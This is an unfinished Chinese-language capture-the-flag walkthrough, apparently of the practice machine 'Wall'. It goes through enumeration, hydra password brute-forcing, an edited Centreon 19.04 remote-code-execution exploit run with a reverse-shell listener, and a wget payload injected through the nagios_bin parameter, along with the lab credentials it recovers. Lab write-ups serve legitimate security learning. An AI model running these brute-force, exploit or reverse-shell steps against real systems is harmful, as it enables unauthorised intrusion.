Wall-rce与绕过waf(上)

参考资料:

最近太忙了ORZ,这篇没做完…

enumeration

22,80

Apache/2.4.29 (Ubuntu) Server

1 说明用户名可能是admin

1
2
3
4
5
6
cd /usr/share/wordlists
 hydra -l admin -P rockyou.txt -s 80 -f 10.10.10.157 http-get /monitoring

 hydra -l admin -P 3000-pass.txt -s 80 -f 10.10.10.157 http-get /monitoring
 hydra -l panel -P rockyou.txt -s 80 -f 10.10.10.157 http-get /monitoring
 hydra -l aa -P rockyou.txt -s 80 -f 10.10.10.157 http-get /monitoring

ssh

OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

6


searchsploit -m exploits/linux/remote/45233.py python 45233.py(type error代码错误)

searchsploit -m exploits/linux/remote/45210.py python 45210.py (TypeError)

searchsploit -m exploits/linux/remote/45939.py python 45939.py –port 22 10.10.10.157 root(TypeError: an integer is required)


hydra -l admin -P rockyou.txt 10.10.10.157 ssh

web

enumeration

dirb http://10.10.10.157 -X .php 存在的目录 http://10.10.10.157/aa.php http://10.10.10.157/monitoring/ http://10.10.10.157/panel.php http://10.10.10.157/centreon

nikto -h http://10.10.10.157 GET, POST, OPTIONS, HEAD


未发现目录遍历

10.10.10.157/monitoring/../panel.php

跳转到panel.php

10.10.10.157/monitoring/../../../../../../../../../etc/passwd 无效


get改post请求,绕过登陆页面。

7

searchsploit centreon

searchsploit -m exploitdb/exploits/php/webapps/47069.py v. 19.04.0

exp下载地址

8

9

python3.6 47069.py http://10.10.10.157/centreon admin passwd1 10.10.14.10 1330

执行后报错,于是修改exp。

1
2
3
4
5
6
。。。。。。
  poller_soup = BeautifulSoup(poller_html)
Traceback (most recent call last):
  File "47069.py", line 57, in <module>
    poller_token = poller_soup.findAll('input')[24].get("value")
IndexError: list index out of range

10

poller_token = poller_soup.find(‘input’, {‘name’: ‘centreon_token’}).get(‘value’)

11

python3 centreon-exploit.py http://10.10.10.157/centreon admin passwd1 IP 8080

反弹shell失败

修改后,无报错的exp地址:https://github.com/Whale3070/ctf-coding/blob/master/47069.py

绕过waf

python3 47069.py http://10.10.10.157/centreon admin password1 10.10.14.18 8081


http://10.10.10.157/centreon/Themes/Centreon-2/

12 目录遍历漏洞


  • http://10.10.10.157/centreon/a.php (CODE:200 SIZE:1)
  • http://10.10.10.157/centreon/index.php (CODE:200 SIZE:3091)
  • http://10.10.10.157/centreon/main.php (CODE:302|SIZE:0)
    http://10.10.10.157/centreon/main.php?p=60901&o=c&server_id=1 nagios_bin参数

http://10.10.10.157/centreon/main.get.php?p=60901 http://10.10.10.157/centreon/include/configuration/configGenerate/xml/generateFiles.php


测试命令执行是否成功,修改payload为

1
wget http://10.10.14.10:888/1.txt #

失败 13


1
2
3
4
5
6
7
8
9
10
hydra -L /usr/share/wordlists/rockyou.txt  -P /usr/share/wordlists/rockyou.txt -V -s 80 

10.10.10.157 http-post-form "/centreon/index.php:useralias=^USER^&password=^PASS^&submitLogin=Connect&centreon_token=d9ab2ad282b929cf8f32486cee14da85:Your credentials are incorrect."

hydra -l centreon  -P /usr/share/wordlists/rockyou.txt -V -s 80 10.10.10.157 http-post-form "/centreon/index.php:useralias=^USER^&password=^PASS^&submitLogin=Connect&centreon_token=d9ab2ad282b929cf8f32486cee14da85:Your credentials are incorrect."

hydra -l admin  -P /usr/share/wordlists/rockyou.txt -V -s 80 10.10.10.157 http-post-form "/centreon/index.php:useralias=^USER^&password=^PASS^&submitLogin=Connect&centreon_token=d9ab2ad282b929cf8f32486cee14da85:Your credentials are incorrect." -t 4

admin/password1
centreon/#1bitch

存在的漏洞

centreon 19.04 rce 后台弱口令 apache目录遍历

根据python exp手动利用漏洞

19.04 版本漏洞 https://www.cvedetails.com/vulnerability-list/vendor_id-7565/product_id-12778/version_id-303583/Centreon-Centreon-19.04.0.html

开启burp,首先访问http://10.10.10.157/centreon/main.php?p=60901&o=c&server_id=1

17

16 注意图中的testpath

待续